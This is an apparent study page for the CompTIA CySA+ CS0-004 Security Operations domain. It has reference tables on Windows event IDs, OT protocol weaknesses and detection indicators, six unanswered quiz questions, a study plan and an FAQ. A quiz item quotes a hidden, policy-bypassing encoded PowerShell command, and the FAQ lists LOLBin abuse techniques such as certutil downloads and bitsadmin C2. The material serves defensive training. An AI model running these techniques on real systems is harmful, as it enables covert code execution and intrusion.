  • OT/ICS: Know the key OT protocols: Modbus, DNP3, BACnet — and their security weaknesses
  • Detect: Identify network, host, application, and cloud indicators from a log excerpt
  • Detect: Define impossible travel and explain when it produces false positives
  • Detect: List the 5 specific BEC indicators distinguishing it from phishing
  • Detect: Describe DNS tunneling characteristics detectable in log data
Reference Tables
Quick-reference data for exam preparation and last-minute review.

Key Windows Event IDs

| Event ID | Event Name | Security Relevance |
|---|---|---|
| 4624 | Successful Logon | Baseline; watch for logon type 3 (network) or type 10 (remote interactive) |
| 4625 | Failed Logon | Multiple failures = brute force or password spray |
| 4648 | Logon with Explicit Credentials | Indicator of pass-the-hash or lateral movement |
| 4688 | Process Creation | Critical for detecting LOLBin abuse, malware execution |
| 4698 | Scheduled Task Created | Common persistence mechanism — watch for tasks created outside change windows |
| 4720 | User Account Created | Unauthorized account creation = potential backdoor |
| 4732 | User Added to Privileged Group | Privilege escalation indicator |
| 4663 | Object Access | Access to sensitive files/directories |
| 4771 | Kerberos Pre-Auth Failed | AS-REP Roasting or Kerberoasting attempts |
| 7045 | New Service Installed | Malware persistence via Windows services |

Cloud Logging Services by Provider

| Provider | Audit/Activity Log | Network Log | Resource Log |
|---|---|---|---|
| AWS | CloudTrail | VPC Flow Logs | CloudWatch Logs |
| Azure | Azure Activity Log | NSG Flow Logs | Azure Monitor / Log Analytics |
| GCP | Cloud Audit Logs | VPC Flow Logs | Cloud Logging (formerly Stackdriver) |

OT/ICS Protocol Reference

| Protocol | Primary Use | Port | Security Weakness |
|---|---|---|---|
| Modbus | PLC communications, manufacturing | TCP 502 | No authentication, no encryption, commands accepted from any source |
| DNP3 | SCADA for utilities (power, water) | TCP/UDP 20000 | Weak authentication (SAv5 adds some), replay attacks possible |
| BACnet | Building automation (HVAC, access) | UDP 47808 | No encryption; BACnet/IP exposed on IT networks creates risk |
| EtherNet/IP | Industrial Ethernet (Rockwell/Allen-Bradley) | TCP 44818 | Authentication optional; vulnerable to replay/MITM |
| Profinet | Industrial Ethernet (Siemens) | Multiple | Device discovery broadcasts; limited access control |

Indicator Type Quick Reference

| Indicator | Type | What to Look For in Logs |
|---|---|---|
| Impossible travel | Identity | Same user, two auth events, geographically impossible timeframe |
| BEC inbox rule | Application | New email rule forwarding to external; rule created shortly after new-location login |
| DNS tunneling | Network | Unusually long subdomain strings; high-frequency DNS queries to same domain |
| C2 beaconing | Network | Regular outbound connections at fixed intervals to same external IP |
| LOLBin abuse | Host | certutil/powershell spawning cmd.exe or making external connections |
| Data exfiltration | Network | Large outbound transfers, especially off-hours; unusual destination IPs |
Practice Quiz
6 scenario-based questions aligned to CS0-004 exam style.
Question 1 of 6
A SOC analyst is trying to correlate events from a firewall, Windows Active Directory, and a cloud SIEM. The events appear to occur in the right order individually, but the timestamps across sources are inconsistent by 10–30 minutes, making timeline reconstruction unreliable. What is the most likely root cause?
Question 2 of 6
During a threat hunt, an analyst finds this PowerShell command in process creation logs (Event ID 4688): powershell -EncodedCommand [long Base64 string] -ExecutionPolicy Bypass -WindowStyle Hidden. Which category of malicious activity does this represent?
Question 3 of 6
An identity threat alert triggers for a user account showing a successful authentication from Toronto, Canada at 09:00 AM, followed by another successful authentication from Seoul, South Korea at 09:45 AM. No VPN usage is recorded for this account. What is this indicator called, and what does it most likely indicate?
Question 4 of 6
A security operations team reviews email gateway logs and discovers that three C-suite accounts have new inbox rules created in the last 48 hours — all forwarding a copy of every received email to an external Gmail address. These accounts also show successful logins from a previously unseen country two days ago. What type of attack is most consistent with these findings?
Question 5 of 6
An organization is implementing remote access for employees and wants to replace their legacy VPN with an architecture that provides application-level access controls, enforces device posture checks, and operates on a "never trust, always verify" principle. Which solution best meets these requirements?
Question 6 of 6
A security analyst is assessing a manufacturing facility that uses SCADA systems to control assembly line equipment. The OT team reports that several PLCs are running firmware from 2018 and cannot be patched without a full production shutdown, which is unacceptable to the business. What is the MOST appropriate compensating control?

Study Plan
A focused 4-week plan for mastering Security Operations Architecture & Detection.

Week 1 — Logging Architecture & OS Security (Days 1–7)

  • Map all log sources in a sample environment: Windows DC, Linux server, firewall, cloud account
  • Configure a free SIEM (Splunk Free, Elastic/ELK) and ingest logs from at least 3 sources
  • Test what happens when NTP is misconfigured — observe timestamp drift in correlation
  • Memorize the 10 key Windows Event IDs from the reference table
  • Write out all 7 LOLBins with their malicious use cases from memory — quiz yourself

Week 2 — Cloud, Container & Identity Security (Days 8–14)

  • Build a free-tier AWS or Azure account and enable CloudTrail/Activity Log — review what it captures
  • Run a Docker container and test the difference between normal and --privileged mode
  • Lab: set up RBAC vs ABAC policies and compare access behavior
  • Research 3 real-world MFA bypass incidents and document how each was detected
  • ZTNA vs SASE: draw a diagram showing ZTNA as a component within SASE

Week 3 — OT/ICS & Indicator Analysis (Days 15–21)

  • Draw the Purdue Model from memory, labeling all 5 levels and the IT/OT DMZ
  • Research the Stuxnet and TRITON attacks — understand what indicators they left
  • Practice log analysis: use Blue Team Labs Online or Splunk BOTS for indicator identification exercises
  • Identify impossible travel scenarios: practice calculating whether travel is physically possible given two timestamps and locations
  • Write BEC vs. phishing indicator comparison table from memory

Week 4 — Review, Practice Questions & Weak Areas (Days 22–28)

  • Take two full practice exams (CompTIA CertMaster Practice, Jason Dion, etc.)
  • For every question missed, trace back to the specific concept and re-study it
  • Focus extra time on any topic scoring below 70% in practice
  • Review the official CS0-004 exam objectives PDF — check every task statement
  • Do a final run through the checklist on this page — should be 100% complete
Common Exam Mistakes
5 mistakes that cost candidates points — know these before exam day.
1. Confusing ZTNA with SASE
Treating them as the same thing — or choosing SASE when the question asks about access control
What Goes Wrong: When a question asks "which technology enforces per-application access control with continuous verification," candidates incorrectly select SASE. SASE is the framework; ZTNA is the specific access control technology within it.
The Fix: ZTNA = the specific access technology (replaces VPN, per-app access, continuous verification). SASE = the cloud-delivered framework that bundles ZTNA + SD-WAN + CASB + SWG + FWaaS. If the question is about access control → ZTNA. If it's about the full cloud security architecture → SASE.
Prevention habit: Draw a Venn diagram with SASE as the outer circle containing ZTNA as one component inside it. Visualize it until automatic.
2. Missing NTP as the Answer to Log Correlation Problems
Choosing SIEM misconfiguration when the real issue is clock synchronization
What Goes Wrong: When presented with a log correlation failure, candidates jump to "the SIEM parser is wrong" or "the log format doesn't match." But the most commonly tested cause is timestamp inconsistency due to NTP not being configured across all log sources.
The Fix: Whenever a scenario describes an inability to correlate events across multiple log sources — especially when timestamps seem "off" — think NTP first. Log format/parsing issues produce different symptoms (missing fields, parsing errors) rather than time-shifted events.
Prevention habit: NTP is "free points" if you remember it. Add it to your exam trigger list: "log correlation problem" → NTP.
3. Confusing BEC with Phishing
Missing that BEC uses legitimate compromised accounts, not spoofed/lookalike domains
What Goes Wrong: BEC scenarios include indicators like new inbox forwarding rules, logins from foreign IPs, and unusual sending behavior. Candidates misidentify this as phishing because "email attack." Phishing uses fake domains; BEC uses the real account.
The Fix: BEC trigger words: forwarding rule to external address, inbox rule deleting sent items, login from new country + rule creation shortly after, wire transfer request from "real" exec email. If the email came from the legitimate domain and the account was recently logged into from an unusual location → BEC.
Prevention habit: BEC = "compromised account + stealth rules." Phishing = "fake domain + lure email." Memorize the distinction.
4. Getting OT/ICS Priority Order Wrong
Applying IT's CIA triad instead of OT's AIC priority order
What Goes Wrong: Candidates default to CIA (Confidentiality first) when answering OT/ICS security questions. In OT environments, Availability is the top priority — a downed power grid or stopped assembly line has immediate physical consequences. Selecting confidentiality-focused controls for an ICS question will always be wrong.
The Fix: OT = AIC (Availability → Integrity → Confidentiality). IT = CIA. When you see "SCADA," "PLC," "manufacturing," "utility," or "operational technology" in a question, switch to AIC mentally. Compensating controls over patching (preserves availability) is the right OT answer.
Prevention habit: "OT = AIC, IT = CIA" — write it on a sticky note. This comes up every exam.
5. Choosing SASE When Specific Access Control Is Asked
Over-engineering the answer by selecting the full framework vs. the specific component
What Goes Wrong: When a question asks "what replaces VPN for zero trust remote access," candidates choose SASE because it sounds comprehensive. But SASE is the delivery architecture; the specific remote access replacement technology is ZTNA.
The Fix: Map each answer to its scope: VPN replacement + zero trust + per-app access = ZTNA. Cloud-delivered network + security stack = SASE. Email security = SEG. Web proxy + URL filtering = SWG. Know where each fits within SASE.
Prevention habit: When answering technology questions, ask: "Is this asking about a specific control (ZTNA) or the overall architecture (SASE)?" The question stem usually tells you.
Frequently Asked Questions
Top questions from CySA+ CS0-004 candidates preparing for this domain.
How much of the CS0-004 exam does Security Operations cover?
Security Operations is the largest domain at 34% (~29 questions). It covers architecture, logging, indicators, tools, threat intel, and AI. We split it across two study pages: this page covers architecture and detection; Page 2 covers tools, threat hunting, and AI in security ops.
What are the most commonly tested LOLBins on CySA+?
The most tested LOLBins are: certutil (file download/decode), PowerShell (download-cradles, encoded commands), wscript/cscript (VBScript execution), mshta (HTA file execution), regsvr32 (Squiblydoo technique), rundll32 (DLL side-loading), and bitsadmin (background file transfer for C2). Know each binary's malicious use case and the detection signal it produces in logs.
What does "impossible travel" mean, and when does it produce false positives?
Impossible travel is when a user account authenticates from two geographically distant locations within a timeframe that makes physical travel impossible. It's a strong indicator of compromised credentials. False positives occur when the user is legitimately using a VPN exit node in another country, is traveling via private jet (faster than commercial estimates), or when GeoIP databases misclassify IP addresses. Always validate against VPN logs before escalating.
What Windows Event IDs are most important to memorize for CS0-004?
Prioritize these: 4624 (successful logon), 4625 (failed logon), 4688 (process creation — essential for LOLBin detection), 4698 (scheduled task created — persistence), 4720 (user account created), 4732 (added to privileged group), 7045 (new service installed). Bonus: 4771 (Kerberos pre-auth failed — Kerberoasting) and 4663 (object access). The Reference tab on this page has the full table.
How should I explain the difference between ZTNA and SASE to answer exam questions correctly?
ZTNA is a specific access control approach: it replaces VPN by granting least-privilege, per-application access based on verified identity and device posture, with no broad network exposure. SASE (Secure Access Service Edge) is a broader cloud-delivered architecture that bundles ZTNA, SD-WAN, CASB, SWG, and FWaaS into a single service. Think of ZTNA as one module inside the SASE package. If a question asks what replaces VPN for zero trust remote access → ZTNA.
Why does OT/ICS prioritize availability over confidentiality?
OT systems control physical processes — power grids, assembly lines, water treatment. An outage or disruption can cause physical damage, safety hazards, or loss of life. Confidentiality of sensor readings matters far less than keeping the process running safely. This is why OT uses AIC order (Availability → Integrity → Confidentiality) instead of IT's CIA order. On the exam, any OT scenario asking about security priorities should lead you toward availability-preserving answers.
What is the difference between BEC and phishing?
Phishing uses spoofed or lookalike email domains to trick users into clicking malicious links or providing credentials — the email comes from a fake address. BEC (Business Email Compromise) occurs after a legitimate business email account has already been compromised. The attacker uses the real account to send emails, create inbox forwarding rules, and gather intelligence. BEC is harder to detect because the emails pass SPF/DKIM/DMARC checks and originate from a trusted domain.
Is the CS0-004 exam harder than CS0-003?
CS0-004 adds significant new material compared to CS0-003: AI in security operations (risks, governance, use cases), expanded cloud-native and container security, stronger emphasis on ZTNA/SASE, and updated threat intel content. The Security Operations domain increased in weight (34% vs. lower in 003). Candidates transitioning from CS0-003 study materials should supplement with AI/ML security concepts and updated cloud security content to be fully prepared for CS0-004.

CompTIA CySA+ CS0-004 — Official Resources

Exam launches June 23, 2026 · 85 questions · 165 minutes · 750/900 passing score